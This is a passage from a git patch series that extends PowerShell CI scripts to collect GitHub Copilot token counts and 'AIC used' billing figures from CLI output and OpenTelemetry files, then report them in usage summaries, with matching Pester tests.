-ToolCount 3 ` + -FailedToolCount 0 ` + -Usage ([pscustomobject]@{ 
totalApiDurationMs = 1000 }) ` + -OtelMetrics $otelMetrics ` + -AicUsed $null ` + -ContextWindow $null ` + -ContextWindowRaw $null ` + -ResultEventSeen $true ` + -ExitCode 0 + + $record.normalizedTokens.inputTokens | Should -Be 500 + $record.normalizedTokens.outputTokens | Should -Be 75 + $record.normalizedTokens.cachedInputTokens | Should -Be 400 + $record.normalizedTokens.reasoningOutputTokens | Should -Be 25 + $record.normalizedTokens.totalTokens | Should -Be 575 + $record.normalizedTokens.otelFile | Should -Be '/tmp/copilot-otel.jsonl' + $record.cliUsage.aicUsed | Should -Be 7.5 + } } Describe 'Get-TrxResults' { diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 3c672e82d089..44632634ce58 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -746,6 +746,158 @@ function Get-CopilotTokenMetrics { } } +function Convert-CopilotCompactNumber { + param([string]$Value) + + if ([string]::IsNullOrWhiteSpace($Value)) { return $null } + + $normalized = ($Value -replace ',', '').Trim() + if ($normalized -notmatch '^(?<number>[0-9]+(?:\.[0-9]+)?)\s*(?<suffix>[KMGkmg])?$') { + return $null + } + + $number = [double]$Matches['number'] + $multiplier = switch ($Matches['suffix'].ToUpperInvariant()) { + 'K' { 1000 } + 'M' { 1000000 } + 'G' { 1000000000 } + default { 1 } + } + + return [long][Math]::Round($number * $multiplier) +} + +function Get-CopilotCliUsageLineData { + param([string]$Line) + + $data = [ordered]@{} + if ([string]::IsNullOrWhiteSpace($Line)) { + return $data + } + + if ($Line -match 'Session:\s*(?<aic>[0-9]+(?:\.[0-9]+)?)\s*AIC\s+used') { + $data.aicUsed = [double]$Matches['aic'] + } + + if ($Line -match '^\s*(?<model>.+?)\s*[\u2022\u00b7]\s*(?<context>[0-9][0-9,]*(?:\.[0-9]+)?\s*[KMGkmg]?)\s+context\s*$') { + $contextRaw = $Matches['context'].Trim() + $data.model = $Matches['model'].Trim() + $data.contextWindowRaw = $contextRaw + $data.contextWindow = Convert-CopilotCompactNumber -Value $contextRaw + } + + return $data +} + +function 
Get-CopilotOtelTokenMetrics { + param([string]$Path) + + $metrics = [ordered]@{ + inputTokens = $null + outputTokens = $null + cachedInputTokens = $null + reasoningOutputTokens = $null + totalTokens = $null + copilotCost = $null + available = $false + file = $Path + } + + if ([string]::IsNullOrWhiteSpace($Path) -or -not (Test-Path $Path)) { + return $metrics + } + + $spanSums = @{ + input = 0.0 + output = 0.0 + cached = 0.0 + reasoning = 0.0 + cost = 0.0 + } + $spanSeen = @{ + input = $false + output = $false + cached = $false + reasoning = $false + cost = $false + } + + $metricSums = @{ + input = 0.0 + output = 0.0 + cached = 0.0 + } + $metricSeen = @{ + input = $false + output = $false + cached = $false + } + + foreach ($line in Get-Content -Path $Path -Encoding UTF8) { + if ([string]::IsNullOrWhiteSpace($line)) { continue } + + try { + $entry = $line | ConvertFrom-Json -ErrorAction Stop + } catch { + continue + } + + if ($entry.type -eq 'span' -and $entry.attributes) { + $attributes = $entry.attributes + $inputValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.input_tokens') + $outputValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.output_tokens') + $cachedValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.cache_read.input_tokens') + $reasoningValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.reasoning.output_tokens') + $costValue = Get-ObjectMemberValue -InputObject $attributes -Names @('github.copilot.cost') + + if (Test-IsNumericValue $inputValue) { $spanSums.input += [double]$inputValue; $spanSeen.input = $true } + if (Test-IsNumericValue $outputValue) { $spanSums.output += [double]$outputValue; $spanSeen.output = $true } + if (Test-IsNumericValue $cachedValue) { $spanSums.cached += [double]$cachedValue; $spanSeen.cached = $true } + if (Test-IsNumericValue $reasoningValue) { $spanSums.reasoning += [double]$reasoningValue; $spanSeen.reasoning = $true 
} + if (Test-IsNumericValue $costValue) { $spanSums.cost += [double]$costValue; $spanSeen.cost = $true } + } elseif ($entry.type -eq 'metric' -and $entry.name -eq 'gen_ai.client.token.usage') { + foreach ($point in @($entry.dataPoints)) { + $tokenType = [string](Get-ObjectMemberValue -InputObject $point.attributes -Names @('gen_ai.token.type')) + $sumValue = Get-ObjectMemberValue -InputObject $point.value -Names @('sum') + if (-not (Test-IsNumericValue $sumValue)) { continue } + + if ($tokenType -eq 'input') { + $metricSums.input += [double]$sumValue + $metricSeen.input = $true + } elseif ($tokenType -eq 'output') { + $metricSums.output += [double]$sumValue + $metricSeen.output = $true + } elseif ($tokenType -match '(?i)cache') { + $metricSums.cached += [double]$sumValue + $metricSeen.cached = $true + } + } + } + } + + $inputTokens = if ($spanSeen.input) { [long][Math]::Round($spanSums.input) } elseif ($metricSeen.input) { [long][Math]::Round($metricSums.input) } else { $null } + $outputTokens = if ($spanSeen.output) { [long][Math]::Round($spanSums.output) } elseif ($metricSeen.output) { [long][Math]::Round($metricSums.output) } else { $null } + $cachedInputTokens = if ($spanSeen.cached) { [long][Math]::Round($spanSums.cached) } elseif ($metricSeen.cached) { [long][Math]::Round($metricSums.cached) } else { $null } + $reasoningOutputTokens = if ($spanSeen.reasoning) { [long][Math]::Round($spanSums.reasoning) } else { $null } + $copilotCost = if ($spanSeen.cost) { [Math]::Round($spanSums.cost, 3) } else { $null } + + $totalTokens = if ($null -ne $inputTokens -or $null -ne $outputTokens) { + [long](($inputTokens ?? 0) + ($outputTokens ?? 
0)) + } else { + $null + } + + $metrics.inputTokens = $inputTokens + $metrics.outputTokens = $outputTokens + $metrics.cachedInputTokens = $cachedInputTokens + $metrics.reasoningOutputTokens = $reasoningOutputTokens + $metrics.totalTokens = $totalTokens + $metrics.copilotCost = $copilotCost + $metrics.available = ($null -ne $inputTokens -or $null -ne $outputTokens -or $null -ne $cachedInputTokens -or $null -ne $copilotCost) + + return $metrics +} + function New-CopilotTokenUsageRecord { param( [int]$PRNumber, @@ -760,12 +912,46 @@ function New-CopilotTokenUsageRecord { [int]$ToolCount, [int]$FailedToolCount, [object]$Usage, + [object]$OtelMetrics, + [object]$AicUsed, + [object]$ContextWindow, + [string]$ContextWindowRaw, [bool]$ResultEventSeen, [int]$ExitCode ) $apiDurationValue = Get-ObjectMemberValue -InputObject $Usage -Names @('totalApiDurationMs', 'total_api_duration_ms') $apiDurationMs = if (Test-IsNumericValue $apiDurationValue) { [long]$apiDurationValue } else { $null } + $usageTokenMetrics = Get-CopilotTokenMetrics -Usage $Usage + + $inputTokens = $usageTokenMetrics.inputTokens + $outputTokens = $usageTokenMetrics.outputTokens + $cachedInputTokens = $usageTokenMetrics.cachedInputTokens + $totalTokens = $usageTokenMetrics.totalTokens + $reasoningOutputTokens = $null + $copilotCost = $null + $otelFile = $null + + if ($OtelMetrics) { + if ($null -eq $inputTokens -and $null -ne $OtelMetrics.inputTokens) { $inputTokens = $OtelMetrics.inputTokens } + if ($null -eq $outputTokens -and $null -ne $OtelMetrics.outputTokens) { $outputTokens = $OtelMetrics.outputTokens } + if ($null -eq $cachedInputTokens -and $null -ne $OtelMetrics.cachedInputTokens) { $cachedInputTokens = $OtelMetrics.cachedInputTokens } + if ($null -eq $totalTokens -and $null -ne $OtelMetrics.totalTokens) { $totalTokens = $OtelMetrics.totalTokens } + $reasoningOutputTokens = $OtelMetrics.reasoningOutputTokens + $copilotCost = $OtelMetrics.copilotCost + $otelFile = $OtelMetrics.file + } + + 
$billingUnits = $AicUsed + if ($null -eq $billingUnits -and $null -ne $copilotCost) { + $billingUnits = $copilotCost + } + if ($null -eq $billingUnits) { + $premiumRequests = Get-ObjectMemberValue -InputObject $Usage -Names @('premiumRequests') + if (Test-IsNumericValue $premiumRequests) { + $billingUnits = [double]$premiumRequests + } + } return [ordered]@{ schemaVersion = 1 @@ -793,7 +979,20 @@ function New-CopilotTokenUsageRecord { turnCount = $TurnCount toolCount = $ToolCount failedToolCount = $FailedToolCount - normalizedTokens = Get-CopilotTokenMetrics -Usage $Usage + cliUsage = [ordered]@{ + aicUsed = $billingUnits + contextWindow = $ContextWindow + contextWindowRaw = $ContextWindowRaw + } + normalizedTokens = [ordered]@{ + inputTokens = $inputTokens + outputTokens = $outputTokens + cachedInputTokens = $cachedInputTokens + reasoningOutputTokens = $reasoningOutputTokens + totalTokens = $totalTokens + rawTokenFields = @($usageTokenMetrics.rawTokenFields) + otelFile = $otelFile + } usage = $Usage costEstimateAvailable = $false costEstimateNote = 'Dollar cost not calculated; no trusted rate table configured.' 
@@ -852,6 +1051,9 @@ function Invoke-CopilotStep { $failedTools = @() $resultEventSeen = $false $resultUsage = $null + $cliAicUsed = $null + $cliContextWindow = $null + $cliContextWindowRaw = $null # Tool icon mapping for common tools $toolIcons = @{ @@ -873,136 +1075,180 @@ function Invoke-CopilotStep { if ([string]::IsNullOrWhiteSpace($modelName)) { $modelName = $copilotModel } - & copilot -p $Prompt --allow-all --output-format json --model $copilotModel --secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN 2>&1 | ForEach-Object { - $line = $_.ToString() - try { - $event = $line | ConvertFrom-Json -ErrorAction Stop - switch ($event.type) { - 'session.tools_updated' { - if ($event.data.model) { - $modelName = $event.data.model - Write-Host " ⚙️ Model: " -ForegroundColor DarkGray -NoNewline - Write-Host $modelName -ForegroundColor DarkCyan + $safeOtelStepName = ($StepName -replace '[^A-Za-z0-9._-]+', '-').Trim('-') + if ([string]::IsNullOrWhiteSpace($safeOtelStepName)) { + $safeOtelStepName = 'copilot-step' + } + $otelPath = $null + if (-not [string]::IsNullOrWhiteSpace($TokenUsageOutputDir)) { + New-Item -ItemType Directory -Path $TokenUsageOutputDir -Force | Out-Null + $otelPath = Join-Path $TokenUsageOutputDir "copilot-otel-$([DateTimeOffset]::UtcNow.ToString('yyyyMMddTHHmmssfffZ'))-$safeOtelStepName-$([guid]::NewGuid().ToString('N')).jsonl" + } + + $savedOtel = @{ + COPILOT_OTEL_FILE_EXPORTER_PATH = $env:COPILOT_OTEL_FILE_EXPORTER_PATH + COPILOT_OTEL_EXPORTER_TYPE = $env:COPILOT_OTEL_EXPORTER_TYPE + OTEL_INSTRUMENTATION_GENAI_CAPTURE_MESSAGE_CONTENT = $env:OTEL_INSTRUMENTATION_GENAI_CAPTURE_MESSAGE_CONTENT + } + try { + if ($otelPath) { + $env:COPILOT_OTEL_FILE_EXPORTER_PATH = $otelPath + $env:COPILOT_OTEL_EXPORTER_TYPE = 'file' + $env:OTEL_INSTRUMENTATION_GENAI_CAPTURE_MESSAGE_CONTENT = 'false' + } + + & copilot -p $Prompt --allow-all --output-format json --model $copilotModel --secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN 2>&1 | 
ForEach-Object { + $line = $_.ToString() + try { + $event = $line | ConvertFrom-Json -ErrorAction Stop + switch ($event.type) { + 'session.tools_updated' { + if ($event.data.model) { + $modelName = $event.data.model + Write-Host " ⚙️ Model: " -ForegroundColor DarkGray -NoNewline + Write-Host $modelName -ForegroundColor DarkCyan + } } - } - 'assistant.turn_start' { - $turnCount++ - $elapsed = $stopwatch.Elapsed.ToString("mm\:ss") - Write-Host "" - Write-Host " ┌─ Turn $turnCount " -ForegroundColor DarkGray -NoNewline - Write-Host "[$elapsed]" -ForegroundColor DarkYellow -NoNewline - if ($currentIntent) { - Write-Host " · $currentIntent" -ForegroundColor DarkCyan - } else { + 'assistant.turn_start' { + $turnCount++ + $elapsed = $stopwatch.Elapsed.ToString("mm\:ss") Write-Host "" + Write-Host " ┌─ Turn $turnCount " -ForegroundColor DarkGray -NoNewline + Write-Host "[$elapsed]" -ForegroundColor DarkYellow -NoNewline + if ($currentIntent) { + Write-Host " · $currentIntent" -ForegroundColor DarkCyan + } else { + Write-Host "" + } } - } - 'assistant.turn_end' { - Write-Host " └─" -ForegroundColor DarkGray - } - 'tool.execution_start' { - $toolName = $event.data.toolName - $args_ = $event.data.arguments - - # Capture intent changes silently - if ($toolName -eq 'report_intent') { - $currentIntent = $args_.intent ?? $currentIntent - Write-Host " │ 🎯 " -ForegroundColor DarkGray -NoNewline - Write-Host $currentIntent -ForegroundColor Yellow - break + 'assistant.turn_end' { + Write-Host " └─" -ForegroundColor DarkGray } + 'tool.execution_start' { + $toolName = $event.data.toolName + $args_ = $event.data.arguments + + # Capture intent changes silently + if ($toolName -eq 'report_intent') { + $currentIntent = $args_.intent ?? 
$currentIntent + Write-Host " │ 🎯 " -ForegroundColor DarkGray -NoNewline + Write-Host $currentIntent -ForegroundColor Yellow + break + } - $toolCount++ - $icon = $toolIcons[$toolName] - if (-not $icon) { - # Prefix match for github-mcp-server-* and other compound names - $icon = if ($toolName -like 'github-*') { '🔀' } else { '🔧' } - } + $toolCount++ + $icon = $toolIcons[$toolName] + if (-not $icon) { + # Prefix match for github-mcp-server-* and other compound names + $icon = if ($toolName -like 'github-*') { '🔀' } else { '🔧' } + } - # Build a short display name for long tool names - $displayName = $toolName -replace '^github-mcp-server-', 'gh/' + # Build a short display name for long tool names + $displayName = $toolName -replace '^github-mcp-server-', 'gh/' - # Pick the most useful detail from arguments - $detail = $args_.description ?? $args_.intent ?? '' - if (-not $detail) { - # Fallback: pick first informative arg - $detail = $args_.command ?? $args_.pattern ?? $args_.query ?? $args_.path ?? $args_.prompt ?? '' - } - if ($detail) { - $detail = $detail.Substring(0, [Math]::Min($detail.Length, 90)) - # Truncate at last word boundary if we cut mid-word - if ($detail.Length -eq 90) { - $lastSpace = $detail.LastIndexOf(' ') - if ($lastSpace -gt 60) { $detail = $detail.Substring(0, $lastSpace) + "…" } - else { $detail += "…" } + # Pick the most useful detail from arguments + $detail = $args_.description ?? $args_.intent ?? '' + if (-not $detail) { + # Fallback: pick first informative arg + $detail = $args_.command ?? $args_.pattern ?? $args_.query ?? $args_.path ?? $args_.prompt ?? 
'' + } + if ($detail) { + $detail = $detail.Substring(0, [Math]::Min($detail.Length, 90)) + # Truncate at last word boundary if we cut mid-word + if ($detail.Length -eq 90) { + $lastSpace = $detail.LastIndexOf(' ') + if ($lastSpace -gt 60) { $detail = $detail.Substring(0, $lastSpace) + "…" } + else { $detail += "…" } + } } - } - Write-Host " │ $icon " -ForegroundColor DarkGray -NoNewline - Write-Host $displayName -ForegroundColor Cyan -NoNewline - if ($detail) { - Write-Host " $detail" -ForegroundColor DarkGray - } else { - Write-Host "" + Write-Host " │ $icon " -ForegroundColor DarkGray -NoNewline + Write-Host $displayName -ForegroundColor Cyan -NoNewline + if ($detail) { + Write-Host " $detail" -ForegroundColor DarkGray + } else { + Write-Host "" + } } - } - 'tool.execution_complete' { - if (-not $event.data.success) { - $failedTool = $event.data.toolCallId - $failedTools += $failedTool - Write-Host " │ ❌ Tool failed" -ForegroundColor Red + 'tool.execution_complete' { + if (-not $event.data.success) { + $failedTool = $event.data.toolCallId + $failedTools += $failedTool + Write-Host " │ ❌ Tool failed" -ForegroundColor Red + } } - } - 'assistant.message' { - $content = $event.data.content - # Show agent text responses (skip empty tool-request-only messages) - if ($content -and $content.Trim()) { - $preview = $content.Trim() - if ($preview.Length -gt 400) { - $preview = $preview.Substring(0, 400) + "…" + 'assistant.message' { + $content = $event.data.content + # Show agent text responses (skip empty tool-request-only messages) + if ($content -and $content.Trim()) { + $preview = $content.Trim() + if ($preview.Length -gt 400) { + $preview = $preview.Substring(0, 400) + "…" + } + Write-Host " │ 💬 " -ForegroundColor DarkGray -NoNewline + Write-Host $preview -ForegroundColor White } - Write-Host " │ 💬 " -ForegroundColor DarkGray -NoNewline - Write-Host $preview -ForegroundColor White } - } - 'result' { - # Final stats — note: 'result' is a top-level event with no 'data' 
wrapper. - $resultEventSeen = $true - $usage = $event.usage - $resultUsage = $usage - if ($usage) { - $elapsed = $stopwatch.Elapsed.ToString("mm\:ss") - $apiMs = if ($usage.totalApiDurationMs) { [math]::Round($usage.totalApiDurationMs / 1000, 1) } else { "?" } - $changes = $usage.codeChanges - $filesChanged = if ($changes -and $changes.filesModified) { @($changes.filesModified).Count } else { 0 } - $linesAdded = if ($changes) { $changes.linesAdded } else { 0 } - $linesRemoved = if ($changes) { $changes.linesRemoved } else { 0 } - - Write-Host "" - Write-Host " ╭──────────────────────────────────────────╮" -ForegroundColor DarkGray - Write-Host " │ ⏱ $elapsed elapsed ($($apiMs)s API)" -ForegroundColor DarkGray -NoNewline - Write-Host " │ 🔧 $toolCount tools" -ForegroundColor DarkGray -NoNewline - Write-Host " │ 🔄 $turnCount turns" -ForegroundColor DarkGray - if ($filesChanged -gt 0 -or $linesAdded -gt 0 -or $linesRemoved -gt 0) { - Write-Host " │ 📝 $filesChanged files " -ForegroundColor DarkGray -NoNewline - Write-Host "+$linesAdded" -ForegroundColor Green -NoNewline - Write-Host "/" -ForegroundColor DarkGray -NoNewline - Write-Host "-$linesRemoved" -ForegroundColor Red + 'result' { + # Final stats — note: 'result' is a top-level event with no 'data' wrapper. + $resultEventSeen = $true + $usage = $event.usage + $resultUsage = $usage + if ($usage) { + $elapsed = $stopwatch.Elapsed.ToString("mm\:ss") + $apiMs = if ($usage.totalApiDurationMs) { [math]::Round($usage.totalApiDurationMs / 1000, 1) } else { "?" 
} + $changes = $usage.codeChanges + $filesChanged = if ($changes -and $changes.filesModified) { @($changes.filesModified).Count } else { 0 } + $linesAdded = if ($changes) { $changes.linesAdded } else { 0 } + $linesRemoved = if ($changes) { $changes.linesRemoved } else { 0 } + + Write-Host "" + Write-Host " ╭──────────────────────────────────────────╮" -ForegroundColor DarkGray + Write-Host " │ ⏱ $elapsed elapsed ($($apiMs)s API)" -ForegroundColor DarkGray -NoNewline + Write-Host " │ 🔧 $toolCount tools" -ForegroundColor DarkGray -NoNewline + Write-Host " │ 🔄 $turnCount turns" -ForegroundColor DarkGray + if ($filesChanged -gt 0 -or $linesAdded -gt 0 -or $linesRemoved -gt 0) { + Write-Host " │ 📝 $filesChanged files " -ForegroundColor DarkGray -NoNewline + Write-Host "+$linesAdded" -ForegroundColor Green -NoNewline + Write-Host "/" -ForegroundColor DarkGray -NoNewline + Write-Host "-$linesRemoved" -ForegroundColor Red + } + Write-Host " ╰──────────────────────────────────────────╯" -ForegroundColor DarkGray } - Write-Host " ╰──────────────────────────────────────────╯" -ForegroundColor DarkGray } } + } catch { + $cliLineData = Get-CopilotCliUsageLineData -Line $line + if ($cliLineData.Contains('aicUsed')) { + $cliAicUsed = $cliLineData.aicUsed + } + if ($cliLineData.Contains('contextWindow')) { + $cliContextWindow = $cliLineData.contextWindow + $cliContextWindowRaw = $cliLineData.contextWindowRaw + } + if ($cliLineData.Contains('model') -and -not [string]::IsNullOrWhiteSpace([string]$cliLineData.model)) { + $modelName = [string]$cliLineData.model + } + + # Non-JSON line (e.g. stats) — pass through as-is + if ($line.Trim()) { + Write-Host " $line" -ForegroundColor DarkGray + } } - } catch { - # Non-JSON line (e.g. 
stats) — pass through as-is - if ($line.Trim()) { - Write-Host " $line" -ForegroundColor DarkGray + } + } finally { + foreach ($key in $savedOtel.Keys) { + if ($null -eq $savedOtel[$key]) { + Remove-Item -Path ("env:" + $key) -ErrorAction SilentlyContinue + } else { + Set-Item -Path ("env:" + $key) -Value $savedOtel[$key] } } } $exitCode = $LASTEXITCODE $stopwatch.Stop() $endedAtUtc = [DateTimeOffset]::UtcNow + $otelMetrics = Get-CopilotOtelTokenMetrics -Path $otelPath $usageRecord = New-CopilotTokenUsageRecord ` -PRNumber $PRNumber ` @@ -1017,6 +1263,10 @@ function Invoke-CopilotStep { -ToolCount $toolCount ` -FailedToolCount (@($failedTools).Count) ` -Usage $resultUsage ` + -OtelMetrics $otelMetrics ` + -AicUsed $cliAicUsed ` + -ContextWindow $cliContextWindow ` + -ContextWindowRaw $cliContextWindowRaw ` -ResultEventSeen $resultEventSeen ` -ExitCode $exitCode Write-CopilotTokenUsageRecord -OutputDir $TokenUsageOutputDir -Record $usageRecord diff --git a/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 b/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 index 6b3d8355a3e1..7de28c850802 100644 --- a/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 +++ b/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 @@ -112,6 +112,23 @@ function Get-NullableSum { return [long][Math]::Round($sum) } +function Get-NullableDecimalSum { + param([object[]]$Values) + + $hasValue = $false + $sum = 0.0 + foreach ($value in @($Values)) { + $numeric = Get-NumericOrNull -Value $value + if ($null -ne $numeric) { + $hasValue = $true + $sum += $numeric + } + } + + if (-not $hasValue) { return $null } + return [Math]::Round($sum, 3) +} + function Get-RecordStageName { param([object]$Record) @@ -132,6 +149,12 @@ function Get-RecordTokenValue { return Get-NestedValue -InputObject $Record -Path @('normalizedTokens', $Name) } +function Get-RecordAicUsed { + param([object]$Record) + + return Get-NestedValue -InputObject $Record -Path @('cliUsage', 'aicUsed') +} + function 
Read-CopilotTokenUsageRecords { param([string]$Root) @@ -187,6 +210,7 @@ function New-StageSummaryRows { outputTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) } else { 0 } cachedInputTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'cachedInputTokens' }) } else { 0 } totalTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) } else { 0 } + aicUsed = if ($hasRecords) { Get-NullableDecimalSum -Values @($stageRecords | ForEach-Object { Get-RecordAicUsed -Record $_ }) } else { 0 } durationMs = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.durationMs }) } else { 0 } apiDurationMs = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.apiDurationMs }) } else { 0 } turnCount = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.turnCount }) } else { 0 } @@ -226,6 +250,7 @@ function New-StepSummaryRows { inputTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'inputTokens' }) outputTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) totalTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) + aicUsed = Get-NullableDecimalSum -Values @($items | ForEach-Object { Get-RecordAicUsed -Record $_ }) durationMs = Get-NullableSum -Values @($items | ForEach-Object { $_.durationMs }) apiDurationMs = Get-NullableSum -Values @($items | ForEach-Object { $_.apiDurationMs }) turnCount = Get-NullableSum -Values @($items | ForEach-Object { $_.turnCount }) @@ -260,6 +285,7 @@ function New-CopilotTokenUsageSummary { outputTokens = Get-NullableSum -Values @($Records | 
ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) cachedInputTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'cachedInputTokens' }) totalTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) + aicUsed = Get-NullableDecimalSum -Values @($Records | ForEach-Object { Get-RecordAicUsed -Record $_ }) durationMs = Get-NullableSum -Values @($Records | ForEach-Object { $_.durationMs }) apiDurationMs = Get-NullableSum -Values @($Records | ForEach-Object { $_.apiDurationMs }) turnCount = Get-NullableSum -Values @($Records | ForEach-Object { $_.turnCount }) @@ -299,6 +325,7 @@ function New-CopilotTokenUsageMarkdown { [void]$lines.Add("| Output tokens | $(Format-UsageValue $Summary.totals.outputTokens) |") [void]$lines.Add("| Cached input tokens | $(Format-UsageValue $Summary.totals.cachedInputTokens) |") [void]$lines.Add("| Total tokens | $(Format-UsageValue $Summary.totals.totalTokens) |") + [void]$lines.Add("| AIC used | $(Format-UsageValue $Summary.totals.aicUsed) |") [void]$lines.Add("| Elapsed ms | $(Format-UsageValue $Summary.totals.durationMs) |") [void]$lines.Add("| API duration ms | $(Format-UsageValue $Summary.totals.apiDurationMs) |") [void]$lines.Add("| Turns | $(Format-UsageValue $Summary.totals.turnCount) |") @@ -306,10 +333,10 @@ function New-CopilotTokenUsageMarkdown { [void]$lines.Add('') [void]$lines.Add('## By stage') [void]$lines.Add('') - [void]$lines.Add('| Stage | Invocations | Input | Output | Cached input | Total | Elapsed ms | API ms | Note |') - [void]$lines.Add('|---|---:|---:|---:|---:|---:|---:|---:|---|') + [void]$lines.Add('| Stage | Invocations | Input | Output | Cached input | Total | AIC used | Elapsed ms | API ms | Note |') + [void]$lines.Add('|---|---:|---:|---:|---:|---:|---:|---:|---:|---|') foreach ($stage in @($Summary.stages)) { - [void]$lines.Add("| $($stage.stageName) | $($stage.invocationCount) 
| $(Format-UsageValue $stage.inputTokens) | $(Format-UsageValue $stage.outputTokens) | $(Format-UsageValue $stage.cachedInputTokens) | $(Format-UsageValue $stage.totalTokens) | $(Format-UsageValue $stage.durationMs) | $(Format-UsageValue $stage.apiDurationMs) | $($stage.note) |") + [void]$lines.Add("| $($stage.stageName) | $($stage.invocationCount) | $(Format-UsageValue $stage.inputTokens) | $(Format-UsageValue $stage.outputTokens) | $(Format-UsageValue $stage.cachedInputTokens) | $(Format-UsageValue $stage.totalTokens) | $(Format-UsageValue $stage.aicUsed) | $(Format-UsageValue $stage.durationMs) | $(Format-UsageValue $stage.apiDurationMs) | $($stage.note) |") } [void]$lines.Add('') [void]$lines.Add('## By Copilot step') @@ -317,10 +344,10 @@ function New-CopilotTokenUsageMarkdown { if (@($Summary.steps).Count -eq 0) { [void]$lines.Add('No Copilot invocations were recorded.') } else { - [void]$lines.Add('| Stage | Phase | Step | Model | Invocations | Input | Output | Total | Elapsed ms | API ms |') - [void]$lines.Add('|---|---|---|---|---:|---:|---:|---:|---:|---:|') + [void]$lines.Add('| Stage | Phase | Step | Model | Invocations | Input | Output | Total | AIC used | Elapsed ms | API ms |') + [void]$lines.Add('|---|---|---|---|---:|---:|---:|---:|---:|---:|---:|') foreach ($step in @($Summary.steps)) { - [void]$lines.Add("| $($step.stageName) | $($step.scriptPhase) | $($step.copilotStep) | $($step.model) | $($step.invocationCount) | $(Format-UsageValue $step.inputTokens) | $(Format-UsageValue $step.outputTokens) | $(Format-UsageValue $step.totalTokens) | $(Format-UsageValue $step.durationMs) | $(Format-UsageValue $step.apiDurationMs) |") + [void]$lines.Add("| $($step.stageName) | $($step.scriptPhase) | $($step.copilotStep) | $($step.model) | $($step.invocationCount) | $(Format-UsageValue $step.inputTokens) | $(Format-UsageValue $step.outputTokens) | $(Format-UsageValue $step.totalTokens) | $(Format-UsageValue $step.aicUsed) | $(Format-UsageValue $step.durationMs) 
| $(Format-UsageValue $step.apiDurationMs) |") } } @@ -347,7 +374,7 @@ $csvPath = Join-Path $OutputDir 'token-usage-by-step.csv' if (@($summary.steps).Count -gt 0) { @($summary.steps) | Export-Csv -Path $csvPath -NoTypeInformation -Encoding UTF8 } else { - 'stageName,scriptPhase,copilotStep,model,invocationCount,inputTokens,outputTokens,totalTokens,durationMs,apiDurationMs,turnCount,toolCount' | + 'stageName,scriptPhase,copilotStep,model,invocationCount,inputTokens,outputTokens,totalTokens,aicUsed,durationMs,apiDurationMs,turnCount,toolCount' | Set-Content -Path $csvPath -Encoding UTF8 } From fb1c6fbc6c5845d3d5fc32a5b7b201e834a76522 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 7 Jun 2026 17:32:14 +0200 Subject: [PATCH 34/34] Handle Copilot OTel token attribute variants Support both dotted and underscore cache/reasoning OTel attribute names so production pipeline runs report cached input and reasoning output tokens consistently. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.Tests.ps1 | 41 ++++++++++++++++++----------- .github/scripts/Review-PR.ps1 | 4 +-- 2 files changed, 28 insertions(+), 17 deletions(-) diff --git a/.github/scripts/Review-PR.Tests.ps1 b/.github/scripts/Review-PR.Tests.ps1 index 362e3e6fa788..d4a4f50ebc3c 100644 --- a/.github/scripts/Review-PR.Tests.ps1 +++ b/.github/scripts/Review-PR.Tests.ps1 @@ -84,28 +84,39 @@ Describe 'Copilot token usage helpers' { $contextLine.contextWindow | Should -Be 1100000 } - It 'reads token counts from Copilot OTel spans' { + It 'reads token counts from Copilot OTel spans with both cache/reasoning naming variants' { $otelPath = Join-Path ([System.IO.Path]::GetTempPath()) "copilot-otel-$([guid]::NewGuid()).jsonl" try { - [ordered]@{ - type = 'span' - attributes = [ordered]@{ - 'gen_ai.usage.input_tokens' = 1000 - 'gen_ai.usage.output_tokens' = 200 - 'gen_ai.usage.cache_read.input_tokens' = 800 - 
